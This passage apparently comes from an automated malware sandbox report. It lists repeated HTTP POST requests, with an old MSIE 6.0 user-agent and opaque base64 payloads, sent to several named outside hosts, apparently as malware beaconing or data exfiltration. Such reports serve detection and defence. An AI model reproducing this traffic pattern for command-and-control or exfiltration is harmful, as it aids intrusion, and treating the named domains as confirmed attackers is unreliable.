61 79 42 4e 34 4f 5a 63 46 59 64 44 71 65 54 2f 72 37 46 63 4e 2f 48 33 32 34 63 42 2b 46 73 73 73 43 68 51 4f 58 35 6a 61 4a 52 58 73 76 6b 75 6e 57 31 49 66 66 68 4d 34 47 4d 4a 6f 6f 43 4c 53 2f 46 35 33 49 6f 76 58 42 68 71 39 74 65 56 69 70 73 65 47 54 4c 67 75 38 41 79 74 37 69 36 48 77 58 6f 78 79 75 53 73 2b 73 38 32 65 48 71 39 36 2b 49 71 4e 35 7a 34 47 58 31 2f 6e 42 79 32 65 50 55 2f 77 46 34 6b 32 72 50 43 48 4a 77 63 51 38 68 6e 46 76 51 34 56 39 57 42 57 31 34 6c 43 77 64 77 7a 64 36 6d 4f 4d 57 36 42 46 6e 73 75 63 38 4d 2b 63 48 41 32 7a 41 6d 44 49 69 62 51 4d 36 62 30 45 57 4f 51 79 39 65 34 6f 42 47 4d 66 39 62 77 3d 3d Data Ascii: af6d1nhOXGfA3/xk+78a7WsUs6HAOs/9LKnIz2q37RYIXJllJ67MG9JBNxKqGN3Fz4m7hwQiNNF+ytMaKkCmHSORkaIuhAalZCRgTG1+u31i4D6rJmfXpxeIE1ziIkZGY5CAfUOajKfGwz7LqXy9q7OG9s75ojniZaWi5g5Ni7xzddvGA0FACbUKW5lZDDklNKkYpdd8Uim8RBKzDtFrDWiQTjv26Lcb9V2nuNpHu4V1TD4ddKArwtzqVowd04HTZNO+pnFYxjVuRH1x3TowEDn0Z2YD4NP5wwk4vhkZyXhbV7sGR1OjzxJuPOWRst/r3hv/ICE4CH8ZpYv3NaEz5tw5qDTST+txayBN4OZcFYdDqeT/r7FcN/H324cB+FsssChQOX5jaJRXsvkunW1IffhM4GMJooCLS/F53IovXBhq9teVipseGTLgu8Ayt7i6HwXoxyuSs+s82eHq96+IqN5z4GX1/nBy2ePU/wF4k2rPCHJwcQ8hnFvQ4V9WBW14lCwdwzd6mOMW6BFnsuc8M+cHA2zAmDIibQM6b0EWOQy9e4oBGMf9bw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 6c 48 53 67 6b 46 79 34 55 57 66 78 51 51 41 46 68 2f 67 46 44 4f 2f 76 6f 33 4a 30 74 4d 79 62 55 47 63 5a 54 54 4d 75 2b 59 6c 52 43 4e 4e 78 68 4a 74 47 6b 45 77 36 42 63 2b 6d 77 77 30 68 68 44 42 55 63 2f 4e 55 66 49 47 45 2f 4f 56 30 6a 70 51 54 65 65 6d 31 4d 64 46 2f 76 54 38 62 37 73 73 66 2f 76 45 34 4f 45 5a 47 54 76 41 2f 4f 2f 4d 70 55 6e 70 34 66 6d 53 4b 30 34 66 55 49 61 6d 2b 4c 31 45 64 63 75 37 50 44 46 59 42 73 51 74 77 55 2f 44 4d 70 38 7a 68 79 77 62 58 75 31 33 78 2f 45 61 4e 32 4a 4a 42 4c 45 6a 68 74 6c 50 77 68 50 45 77 64 71 4d 4f 58 57 45 43 74 50 76 62 35 47 4a 61 63 62 43 55 73 49 37 32 37 59 71 73 4f 7a 79 2f 41 53 6f 48 76 73 45 52 61 39 6d 62 61 6b 45 34 6f 2f 76 6c 2b 43 38 75 77 62 33 32 66 46 6a 65 74 35 52 55 71 41 6c 31 57 43 39 61 68 55 71 61 49 4d 55 62 68 73 38 5a 63 2b 4c 6c 4d 47 67 36 6e 48 74 67 67 54 35 35 53 7a 49 57 32 75 55 57 52 75 73 62 4a 47 48 4f 6e 77 55 67 59 45 4b 4e 73 78 4d 42 5a 57 4e 7a 69 53 52 35 35 64 57 70 70 53 74 32 53 73 56 37 6c 73 6e 69 51 76 45 42 4f 72 75 67 70 39 33 2f 55 30 66 31 7a 4a 6d 70 5a 32 4c 30 6c 35 4d 63 34 52 77 69 61 75 55 42 2f 53 56 76 36 61 4d 32 49 78 38 55 6f 42 62 64 35 76 2b 5a 58 32 51 76 54 51 46 61 4c 49 4d 54 59 6b 4d 6d 6d 53 34 4b 46 34 5a 33 38 31 59 7a 34 61 6b 44 38 2f 47 4f 57 56 6a 54 63 58 4c 43 4a 36 6a 70 4c 49 35 32 75 49 50 57 37 43 70 35 51 54 54 63 71 77 43 4c 67 2b 39 30 76 67 4e 6b 6c 56 36 37 69 59 58 31 72 4f 64 69 57 48 75 77 47 31 64 62 47 72 6e 4f 4c 5a 50 4d 6c 4f 58 77 65 74 45 70 31 6f 46 54 59 4f 37 72 58 48 32 6e 6e 67 49 49 30 73 30 2b 6b 67 39 41 4e 69 68 6f 35 68 34 49 49 6e 38 32 32 4f 44 45 6d 64 56 48 61 6a 7a 7a 54 39 2b 44 6c 4c 75 34 31 59 36 75 45 62 65 52 7a 2f 31 46 51 69 41 69 39 47 32 5a 41 77 3d 3d Data Ascii: lHSgkFy4UWfxQQAFh/gFDO/vo3J0tMybUGcZTTMu+YlRCNNxhJtGkEw6Bc+mww0hhDBUc/NUfIGE/OV0jpQTeem1MdF/vT8b7ssf/vE4OEZGTvA/O/MpUnp4fmSK04fUIam+L1Edcu7PDFYBsQtwU/DMp8zhywbXu13x/EaN2JJBLEjhtlPwhPEwdqMOXWECtPvb5GJacbCUsI727YqsOzy/ASoHvsERa9mbakE4o/vl+C8uwb32fFjet5RUqAl1WC9ahUqaIMUbhs8Zc+LlMGg6nHtggT55SzIW2uUWRusbJGHOnwUgYEKNsxMBZWNziSR55dWppSt2SsV7lsniQvEBOrugp93/U0f1zJmpZ2L0l5Mc4RwiauUB/SVv6aM2Ix8UoBbd5v+ZX2QvTQFaLIMTYkMmmS4KF4Z381Yz4akD8/GOWVjTcXLCJ6jpLI52uIPW7Cp5QTTcqwCLg+90vgNklV67iYX1rOdiWHuwG1dbGrnOLZPMlOXwetEp1oFTYO7rXH2nngII0s0+kg9ANiho5h4IIn822ODEmdVHajzzT9+DlLu41Y6uEbeRz/1FQiAi9G2ZAw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 72 4e 55 58 4f 56 72 52 5a 32 66 77 6c 7a 78 52 66 58 44 6f 53 35 32 33 78 62 74 4b 50 42 46 49 4c 72 6b 35 43 41 4c 64 5a 69 4e 54 7a 75 62 53 73 48 37 61 35 33 35 4a 7a 69 72 58 47 38 2b 68 64 46 6e 6c 4f 75 59 4e 30 4e 6d 2b 58 58 77 6e 56 73 74 31 71 36 4a 51 5a 49 44 79 49 4a 45 6a 58 47 4d 69 58 5a 63 73 70 78 46 6d 30 56 47 66 33 59 78 33 6b 35 75 59 45 52 32 75 6d 68 38 6d 48 68 55 32 35 36 6a 50 50 62 48 78 2f 72 46 72 55 39 46 6c 69 37 42 37 49 6b 34 32 30 71 77 4a 63 68 53 6b 4b 59 47 75 75 75 52 5a 5a 54 4a 51 56 47 4b 35 4b 66 69 31 64 52 71 77 65 39 73 6f 50 53 51 4c 43 48 51 55 36 63 49 41 47 6c 30 35 62 48 63 48 49 65 4e 63 78 69 4c 31 71 78 66 73 4d 57 6a 6f 70 68 52 73 62 65 4a 52 4b 50 4c 6d 33 41 54 56 5a 45 38 30 43 49 4f 50 42 57 7a 47 34 7a 76 6b 6b 72 4c 48 75 49 68 64 56 37 2b 5a 77 35 6d 67 58 56 54 2b 77 74 62 30 55 74 58 32 49 4d 6d 74 2b 68 4f 4f 4e 39 42 4e 72 6f 77 34 58 41 49 4e 56 38 35 79 39 67 49 49 44 4c 44 56 5a 35 50 30 4c 4a 31 61 70 4c 50 37 6c 61 66 6b 30 57 79 6e 59 52 72 7a 42 58 37 76 44 66 42 6b 62 62 37 66 39 35 5a 57 58 56 6a 6e 59 49 74 54 41 79 78 54 33 52 42 7a 6a 62 71 39 53 53 42 34 65 55 46 4e 43 73 35 6a 58 38 75 56 2b 68 59 4a 51 30 6a 63 42 43 73 55 66 46 6c 77 48 6c 58 7a 6f 61 52 50 49 63 42 77 72 61 5a 51 38 43 43 70 59 4d 6a 4e 52 6b 6f 61 2b 43 6a 45 73 51 68 6d 4d 37 58 6d 4f 61 46 63 74 5a 57 54 34 59 77 61 6b 33 65 6d 42 47 49 6d 78 78 58 78 4b 45 32 53 63 32 42 41 34 36 76 75 47 30 52 54 79 72 73 6a 7a 54 79 33 65 77 75 46 66 57 39 4c 73 46 46 6d 52 30 79 5a 75 2b 54 71 68 62 45 34 31 74 58 72 2b 6b 53 33 43 6f 66 52 66 79 6c 47 4b 46 43 74 79 58 48 33 4c 46 63 3d Data Ascii: rNUXOVrRZ2fwlzxRfXDoS523xbtKPBFILrk5CALdZiNTzubSsH7a535JzirXG8+hdFnlOuYN0Nm+XXwnVst1q6JQZIDyIJEjXGMiXZcspxFm0VGf3Yx3k5uYER2umh8mHhU256jPPbHx/rFrU9Fli7B7Ik420qwJchSkKYGuuuRZZTJQVGK5Kfi1dRqwe9soPSQLCHQU6cIAGl05bHcHIeNcxiL1qxfsMWjophRsbeJRKPLm3ATVZE80CIOPBWzG4zvkkrLHuIhdV7+Zw5mgXVT+wtb0UtX2IMmt+hOON9BNrow4XAINV85y9gIIDLDVZ5P0LJ1apLP7lafk0WynYRrzBX7vDfBkbb7f95ZWXVjnYItTAyxT3RBzjbq9SSB4eUFNCs5jX8uV+hYJQ0jcBCsUfFlwHlXzoaRPIcBwraZQ8CCpYMjNRkoa+CjEsQhmM7XmOaFctZWT4Ywak3emBGImxxXxKE2Sc2BA46vuG0RTyrsjzTy3ewuFfW9LsFFmR0yZu+TqhbE41tXr+kS3CofRfylGKFCtyXH3LFc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 76 47 52 69 75 77 61 74 66 47 64 50 50 52 76 70 49 53 42 4b 45 43 6d 49 48 4d 70 6d 6a 39 56 63 6d 68 6d 4e 78 74 5a 31 6e 41 2b 61 4d 65 36 6b 64 4d 72 49 4f 77 43 62 4c 67 53 4b 51 59 65 41 53 36 33 53 32 32 4b 63 6c 72 43 50 4a 6d 65 36 6e 70 4a 4f 62 7a 5a 6b 31 62 6a 68 31 35 2f 58 64 66 79 36 69 66 4d 77 61 52 4c 36 56 43 70 6f 69 76 4c 47 4a 4a 79 4b 37 61 6e 71 4d 47 63 6c 47 79 2f 49 5a 63 72 5a 78 4e 7a 4f 67 70 6c 31 67 44 4d 46 36 33 69 36 79 67 73 44 34 6e 7a 61 4f 36 71 46 37 32 78 72 59 55 77 63 7a 39 56 6a 4f 33 54 6b 6b 77 68 73 46 78 7a 2b 44 73 38 72 32 48 56 39 6d 51 73 75 43 74 61 2b 4c 51 75 4c 4d 66 68 59 76 6f 46 6c 69 55 6d 51 4c 32 58 57 72 32 64 32 55 41 61 31 31 31 58 76 48 30 51 33 67 50 59 42 52 4f 34 78 2b 4e 4f 61 5a 50 31 77 68 79 36 51 44 62 47 6c 77 36 31 62 6f 74 44 6f 35 65 35 4c 64 39 4f 2f 6a 68 4e 43 7a 48 6c 6a 59 79 47 30 67 50 30 32 79 44 55 70 38 6f 43 43 5a 51 64 54 79 75 58 74 74 35 56 6a 71 36 46 41 6f 52 58 79 50 73 32 5a 50 70 73 66 79 69 2f 67 70 67 36 39 55 59 41 4a 7a 4b 32 57 69 66 4c 43 36 67 51 49 4b 5a 31 6a 55 63 55 5a 51 50 55 47 33 70 56 43 79 62 45 34 4e 6b 44 39 7a 4b 62 6c 53 38 33 65 79 39 47 2f 75 55 49 78 74 4a 49 6c 5a 47 47 32 53 36 69 6b 35 71 70 59 67 4a 6a 32 79 74 4b 30 64 6e 31 34 54 38 64 56 72 34 6d 31 38 55 4e 76 7a 70 6b 63 36 62 37 38 58 53 77 72 73 68 7a 70 33 66 4c 79 50 62 44 7a 42 4c 46 39 74 43 53 4a 6a 6a 49 5a 31 73 6a 53 52 52 39 73 79 64 56 70 66 58 54 74 69 73 67 77 76 61 52 66 58 4e 71 33 4d 78 47 2b 52 45 6c 76 72 6e 6e 79 46 4a 41 5a 74 38 63 31 4c 44 2f 6e 53 71 67 4c 2f 36 38 48 77 42 74 49 79 79 57 39 38 72 79 48 69 63 4d 6d 53 45 59 35 64 4d 74 65 42 73 57 73 66 70 49 3d Data Ascii: vGRiuwatfGdPPRvpISBKECmIHMpmj9VcmhmNxtZ1nA+aMe6kdMrIOwCbLgSKQYeAS63S22KclrCPJme6npJObzZk1bjh15/Xdfy6ifMwaRL6VCpoivLGJJyK7anqMGclGy/IZcrZxNzOgpl1gDMF63i6ygsD4nzaO6qF72xrYUwcz9VjO3TkkwhsFxz+Ds8r2HV9mQsuCta+LQuLMfhYvoFliUmQL2XWr2d2UAa111XvH0Q3gPYBRO4x+NOaZP1why6QDbGlw61botDo5e5Ld9O/jhNCzHljYyG0gP02yDUp8oCCZQdTyuXtt5Vjq6FAoRXyPs2ZPpsfyi/gpg69UYAJzK2WifLC6gQIKZ1jUcUZQPUG3pVCybE4NkD9zKblS83ey9G/uUIxtJIlZGG2S6ik5qpYgJj2ytK0dn14T8dVr4m18UNvzpkc6b78XSwrshzp3fLyPbDzBLF9tCSJjjIZ1sjSRR9sydVpfXTtisgwvaRfXNq3MxG+RElvrnnyFJAZt8c1LD/nSqgL/68HwBtIyyW98ryHicMmSEY5dMteBsWsfpI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 72 4e 55 58 4f 56 72 52 5a 32 66 77 6c 7a 78 52 66 58 44 6f 53 35 32 33 78 62 74 4b 50 42 46 49 4c 72 6b 35 43 41 4c 64 5a 69 4e 54 7a 75 62 53 73 48 37 61 35 33 35 4a 7a 69 72 58 47 38 2b 68 64 46 6e 6c 4f 75 59 4e 30 4e 6d 2b 58 58 77 6e 56 73 74 31 71 36 4a 51 5a 49 44 79 49 4a 45 6a 58 47 4d 69 58 5a 63 73 70 78 46 6d 30 56 47 66 33 59 78 33 6b 35 75 59 45 52 32 75 6d 68 38 6d 48 68 55 32 35 36 6a 50 50 62 48 78 2f 72 46 72 55 39 46 6c 69 37 42 37 49 6b 34 32 30 71 77 4a 63 68 53 6b 4b 59 47 75 75 75 52 5a 5a 54 4a 51 56 47 4b 35 4b 66 69 31 64 52 71 77 65 39 73 6f 50 53 51 4c 43 48 51 55 36 63 49 41 47 6c 30 35 62 48 63 48 49 65 4e 63 78 69 4c 31 71 78 66 73 4d 57 6a 6f 70 68 52 73 62 65 4a 52 4b 50 4c 6d 33 41 54 56 5a 45 38 30 43 49 4f 50 42 57 7a 47 34 7a 76 6b 6b 72 4c 48 75 49 68 64 56 37 2b 5a 77 35 6d 67 58 56 54 2b 77 74 62 30 55 74 58 32 49 4d 6d 74 2b 68 4f 4f 4e 39 42 4e 72 6f 77 34 58 41 49 4e 56 38 35 79 39 67 49 49 44 4c 44 56 5a 35 50 30 4c 4a 31 61 70 4c 50 37 6c 61 66 6b 30 57 79 6e 59 52 72 7a 42 58 37 76 44 66 42 6b 62 62 37 66 39 35 5a 57 58 56 6a 6e 59 49 74 54 41 79 78 54 33 52 42 7a 6a 62 71 39 53 53 42 34 65 55 46 4e 43 73 35 6a 58 38 75 56 2b 68 59 4a 51 30 6a 63 42 43 73 55 66 46 6c 77 48 6c 58 7a 6f 61 52 50 49 63 42 77 72 61 5a 51 38 43 43 70 59 4d 6a 4e 52 6b 6f 61 2b 43 6a 45 73 51 68 6d 4d 37 58 6d 4f 61 46 63 74 5a 57 54 34 59 77 61 6b 33 65 6d 42 47 49 6d 78 78 58 78 4b 45 32 53 63 32 42 41 34 36 76 75 47 30 52 54 79 72 73 6a 7a 54 79 33 65 77 75 46 66 57 39 4c 73 46 46 6d 52 30 79 5a 75 2b 54 71 68 62 45 34 31 74 58 72 2b 6b 53 33 43 6f 66 52 66 79 6c 47 4b 46 43 74 79 58 48 33 4c 46 63 3d Data Ascii: rNUXOVrRZ2fwlzxRfXDoS523xbtKPBFILrk5CALdZiNTzubSsH7a535JzirXG8+hdFnlOuYN0Nm+XXwnVst1q6JQZIDyIJEjXGMiXZcspxFm0VGf3Yx3k5uYER2umh8mHhU256jPPbHx/rFrU9Fli7B7Ik420qwJchSkKYGuuuRZZTJQVGK5Kfi1dRqwe9soPSQLCHQU6cIAGl05bHcHIeNcxiL1qxfsMWjophRsbeJRKPLm3ATVZE80CIOPBWzG4zvkkrLHuIhdV7+Zw5mgXVT+wtb0UtX2IMmt+hOON9BNrow4XAINV85y9gIIDLDVZ5P0LJ1apLP7lafk0WynYRrzBX7vDfBkbb7f95ZWXVjnYItTAyxT3RBzjbq9SSB4eUFNCs5jX8uV+hYJQ0jcBCsUfFlwHlXzoaRPIcBwraZQ8CCpYMjNRkoa+CjEsQhmM7XmOaFctZWT4Ywak3emBGImxxXxKE2Sc2BA46vuG0RTyrsjzTy3ewuFfW9LsFFmR0yZu+TqhbE41tXr+kS3CofRfylGKFCtyXH3LFc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 76 47 52 69 75 77 61 74 66 47 64 50 50 52 76 70 49 53 42 4b 45 43 6d 49 48 4d 70 6d 6a 39 56 63 6d 68 6d 4e 78 74 5a 31 6e 41 2b 61 4d 65 36 6b 64 4d 72 49 4f 77 43 62 4c 67 53 4b 51 59 65 41 53 36 33 53 32 32 4b 63 6c 72 43 50 4a 6d 65 36 6e 70 4a 4f 62 7a 5a 6b 31 62 6a 68 31 35 2f 58 64 66 79 36 69 66 4d 77 61 52 4c 36 56 43 70 6f 69 76 4c 47 4a 4a 79 4b 37 61 6e 71 4d 47 63 6c 47 79 2f 49 5a 63 72 5a 78 4e 7a 4f 67 70 6c 31 67 44 4d 46 36 33 69 36 79 67 73 44 34 6e 7a 61 4f 36 71 46 37 32 78 72 59 55 77 63 7a 39 56 6a 4f 33 54 6b 6b 77 68 73 46 78 7a 2b 44 73 38 72 32 48 56 39 6d 51 73 75 43 74 61 2b 4c 51 75 4c 4d 66 68 59 76 6f 46 6c 69 55 6d 51 4c 32 58 57 72 32 64 32 55 41 61 31 31 31 58 76 48 30 51 33 67 50 59 42 52 4f 34 78 2b 4e 4f 61 5a 50 31 77 68 79 36 51 44 62 47 6c 77 36 31 62 6f 74 44 6f 35 65 35 4c 64 39 4f 2f 6a 68 4e 43 7a 48 6c 6a 59 79 47 30 67 50 30 32 79 44 55 70 38 6f 43 43 5a 51 64 54 79 75 58 74 74 35 56 6a 71 36 46 41 6f 52 58 79 50 73 32 5a 50 70 73 66 79 69 2f 67 70 67 36 39 55 59 41 4a 7a 4b 32 57 69 66 4c 43 36 67 51 49 4b 5a 31 6a 55 63 55 5a 51 50 55 47 33 70 56 43 79 62 45 34 4e 6b 44 39 7a 4b 62 6c 53 38 33 65 79 39 47 2f 75 55 49 78 74 4a 49 6c 5a 47 47 32 53 36 69 6b 35 71 70 59 67 4a 6a 32 79 74 4b 30 64 6e 31 34 54 38 64 56 72 34 6d 31 38 55 4e 76 7a 70 6b 63 36 62 37 38 58 53 77 72 73 68 7a 70 33 66 4c 79 50 62 44 7a 42 4c 46 39 74 43 53 4a 6a 6a 49 5a 31 73 6a 53 52 52 39 73 79 64 56 70 66 58 54 74 69 73 67 77 76 61 52 66 58 4e 71 33 4d 78 47 2b 52 45 6c 76 72 6e 6e 79 46 4a 41 5a 74 38 63 31 4c 44 2f 6e 53 71 67 4c 2f 36 38 48 77 42 74 49 79 79 57 39 38 72 79 48 69 63 4d 6d 53 45 59 35 64 4d 74 65 42 73 57 73 66 70 49 3d Data Ascii: vGRiuwatfGdPPRvpISBKECmIHMpmj9VcmhmNxtZ1nA+aMe6kdMrIOwCbLgSKQYeAS63S22KclrCPJme6npJObzZk1bjh15/Xdfy6ifMwaRL6VCpoivLGJJyK7anqMGclGy/IZcrZxNzOgpl1gDMF63i6ygsD4nzaO6qF72xrYUwcz9VjO3TkkwhsFxz+Ds8r2HV9mQsuCta+LQuLMfhYvoFliUmQL2XWr2d2UAa111XvH0Q3gPYBRO4x+NOaZP1why6QDbGlw61botDo5e5Ld9O/jhNCzHljYyG0gP02yDUp8oCCZQdTyuXtt5Vjq6FAoRXyPs2ZPpsfyi/gpg69UYAJzK2WifLC6gQIKZ1jUcUZQPUG3pVCybE4NkD9zKblS83ey9G/uUIxtJIlZGG2S6ik5qpYgJj2ytK0dn14T8dVr4m18UNvzpkc6b78XSwrshzp3fLyPbDzBLF9tCSJjjIZ1sjSRR9sydVpfXTtisgwvaRfXNq3MxG+RElvrnnyFJAZt8c1LD/nSqgL/68HwBtIyyW98ryHicMmSEY5dMteBsWsfpI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 47 2f 54 41 62 77 58 6f 63 57 63 38 76 67 4f 64 4c 4c 6b 6d 69 48 34 69 2f 4c 54 54 57 35 59 4f 43 65 55 33 34 70 71 49 38 77 6e 69 53 58 4e 72 46 54 50 7a 48 72 48 6f 55 35 55 59 67 52 6d 49 69 56 59 2b 49 67 42 67 47 65 62 58 79 54 51 6e 78 70 48 7a 34 38 2f 72 6a 68 36 76 59 78 4d 64 77 56 64 7a 55 51 74 7a 75 72 6f 54 30 37 75 7a 54 41 65 35 49 4f 61 4e 56 41 33 6a 73 37 6d 7a 47 44 6d 44 67 4d 7a 76 69 34 56 4c 35 2f 47 57 55 57 50 31 48 46 34 61 78 72 65 2f 50 63 30 59 6c 36 63 79 54 6c 44 61 35 53 37 4c 55 76 6f 47 46 70 53 5a 48 30 6d 4e 34 56 4a 41 58 2f 46 41 59 43 4c 77 36 72 78 39 32 30 65 45 57 79 43 56 66 45 57 31 6a 2b 4f 79 56 2f 5a 61 48 75 6c 68 73 43 4c 74 53 74 74 6d 35 73 48 34 4e 4f 35 4c 4b 64 79 76 70 4c 67 71 33 68 71 36 32 43 50 50 2f 71 44 67 46 4b 6e 6c 56 45 6e 33 32 43 45 64 34 43 76 42 70 58 4a 4d 30 46 35 70 43 57 75 62 6b 53 56 37 49 32 51 2f 6e 52 6b 36 44 63 49 61 62 48 30 46 4d 33 38 76 71 4c 4e 55 4a 41 58 42 31 70 49 4f 4f 6e 2f 5a 4d 39 41 71 74 55 54 65 48 46 6c 4b 41 73 4a 33 52 35 66 4c 6a 6c 78 79 73 44 64 4d 6a 47 66 41 64 39 35 34 6b 49 61 54 6b 54 44 57 74 37 5a 65 56 32 6d 66 73 4f 45 48 6b 31 51 5a 73 36 2b 50 78 30 59 63 78 35 65 4e 4f 4b 63 56 49 57 6c 72 51 64 66 75 4a 42 4c 62 45 5a 55 54 71 49 42 2b 64 65 31 6c 6d 5a 79 4b 6c 76 78 4b 57 38 6b 67 50 4b 51 54 52 53 54 6b 7a 64 41 4d 57 61 77 33 32 39 49 37 52 79 47 46 79 36 53 71 6b 4b 44 6b 43 53 59 63 6a 5a 4b 66 4b 34 69 76 42 62 61 6b 44 44 64 71 44 76 65 45 6e 6f 2f 30 6e 70 6c 70 6e 71 41 34 73 78 64 68 64 38 5a 7a 47 61 54 68 76 70 55 67 4d 6d 31 43 6f 57 4c 49 70 61 79 76 43 6f 61 56 50 48 63 3d Data Ascii: G/TAbwXocWc8vgOdLLkmiH4i/LTTW5YOCeU34pqI8wniSXNrFTPzHrHoU5UYgRmIiVY+IgBgGebXyTQnxpHz48/rjh6vYxMdwVdzUQtzuroT07uzTAe5IOaNVA3js7mzGDmDgMzvi4VL5/GWUWP1HF4axre/Pc0Yl6cyTlDa5S7LUvoGFpSZH0mN4VJAX/FAYCLw6rx920eEWyCVfEW1j+OyV/ZaHulhsCLtSttm5sH4NO5LKdyvpLgq3hq62CPP/qDgFKnlVEn32CEd4CvBpXJM0F5pCWubkSV7I2Q/nRk6DcIabH0FM38vqLNUJAXB1pIOOn/ZM9AqtUTeHFlKAsJ3R5fLjlxysDdMjGfAd954kIaTkTDWt7ZeV2mfsOEHk1QZs6+Px0Ycx5eNOKcVIWlrQdfuJBLbEZUTqIB+de1lmZyKlvxKW8kgPKQTRSTkzdAMWaw329I7RyGFy6SqkKDkCSYcjZKfK4ivBbakDDdqDveEno/0nplpnqA4sxdhd8ZzGaThvpUgMm1CoWLIpayvCoaVPHc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 74 77 48 76 75 35 57 78 66 47 65 36 57 73 2f 55 66 46 55 53 68 49 37 79 43 71 53 6a 54 4d 31 71 6d 66 39 45 2b 52 57 39 31 4f 70 45 68 6d 32 38 42 71 49 63 55 73 2b 72 77 61 73 70 44 79 64 66 50 76 6a 71 6c 43 41 72 4a 7a 66 59 4f 48 5a 48 61 74 67 74 66 50 57 76 6a 55 34 65 4b 6e 34 41 6a 36 54 44 5a 34 64 67 34 59 6c 77 4b 78 50 65 36 78 37 34 42 51 67 50 4c 47 61 68 4f 65 48 49 73 35 53 63 4c 53 58 39 68 63 75 37 4e 6d 49 66 6e 55 43 41 4c 72 6d 42 74 32 47 75 68 57 61 71 64 7a 71 72 42 6f 34 79 79 4f 2f 4e 53 53 75 4b 37 69 57 34 69 4d 71 44 64 7a 51 6c 78 63 75 52 59 52 6f 44 61 45 36 61 73 55 73 4d 66 59 2f 30 6b 69 6d 35 79 66 6c 63 42 50 43 50 36 47 6f 54 41 35 4a 53 6d 59 44 4b 38 73 78 46 54 68 76 6b 6a 51 72 65 61 5a 31 38 35 6b 7a 71 6a 75 44 68 65 52 52 76 53 43 73 47 74 43 58 48 39 41 44 4c 30 79 53 45 33 35 61 44 50 64 78 50 39 56 6f 4e 75 38 66 2b 77 59 6e 53 72 64 45 51 6b 6a 2f 6c 36 62 51 68 73 69 68 74 6c 72 49 37 6c 69 6b 73 35 30 6b 36 59 36 49 6c 67 7a 33 62 71 6f 49 30 77 76 4b 62 36 38 69 44 65 31 52 51 35 6a 65 31 77 6a 36 62 38 6a 51 74 42 77 70 67 62 36 64 50 55 45 2f 56 63 73 7a 68 6e 54 59 71 74 71 52 56 4f 43 76 57 4d 38 35 62 55 48 54 62 34 4d 47 51 6c 48 59 4e 78 77 61 74 56 55 42 69 54 70 5a 42 4c 6c 7a 78 45 30 49 2f 4d 64 49 4b 6d 43 68 71 71 56 67 37 34 33 6a 75 65 39 64 46 67 49 62 44 55 66 4e 70 78 4f 7a 68 44 44 77 2b 62 6d 59 65 45 78 6d 44 6c 6d 69 58 6d 7a 44 64 30 72 4f 75 55 65 73 2f 2f 4c 46 6d 38 67 37 52 41 4a 67 30 36 7a 53 79 67 54 32 67 6b 45 45 32 50 54 76 34 41 36 35 59 4a 75 53 70 57 78 4c 73 6e 54 4b 6a 58 30 43 6e 57 71 79 6c 61 57 55 66 4e 6a 78 74 38 59 70 36 54 46 56 38 79 32 41 45 Data Ascii: twHvu5WxfGe6Ws/UfFUShI7yCqSjTM1qmf9E+RW91OpEhm28BqIcUs+rwaspDydfPvjqlCArJzfYOHZHatgtfPWvjU4eKn4Aj6TDZ4dg4YlwKxPe6x74BQgPLGahOeHIs5ScLSX9hcu7NmIfnUCALrmBt2GuhWaqdzqrBo4yyO/NSSuK7iW4iMqDdzQlxcuRYRoDaE6asUsMfY/0kim5yflcBPCP6GoTA5JSmYDK8sxFThvkjQreaZ185kzqjuDheRRvSCsGtCXH9ADL0ySE35aDPdxP9VoNu8f+wYnSrdEQkj/l6bQhsihtlrI7liks50k6Y6Ilgz3bqoI0wvKb68iDe1RQ5je1wj6b8jQtBwpgb6dPUE/VcszhnTYqtqRVOCvWM85bUHTb4MGQlHYNxwatVUBiTpZBLlzxE0I/MdIKmChqqVg743jue9dFgIbDUfNpxOzhDDw+bmYeExmDlmiXmzDd0rOuUes//LFm8g7RAJg06zSygT2gkEE2PTv4A65YJuSpWxLsnTKjX0CnWqylaWUfNjxt8Yp6TFV8y2AE
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 44 4c 42 67 37 6a 4f 6c 68 6d 63 66 64 37 58 56 65 71 67 53 52 74 79 4a 75 62 71 5a 63 79 70 4f 46 30 35 6f 72 62 78 54 39 34 79 5a 52 5a 32 64 33 35 2b 56 49 75 30 6d 6c 68 41 79 77 6b 48 38 61 73 64 63 42 6b 69 56 58 71 51 32 50 34 37 57 43 33 67 45 69 69 76 61 72 4b 59 51 6c 41 72 50 2f 65 69 52 57 55 39 41 6e 50 6e 2b 70 6c 56 6f 72 59 73 39 4b 73 63 5a 69 6d 30 39 70 6b 69 67 62 32 72 6b 56 32 32 62 54 66 41 68 38 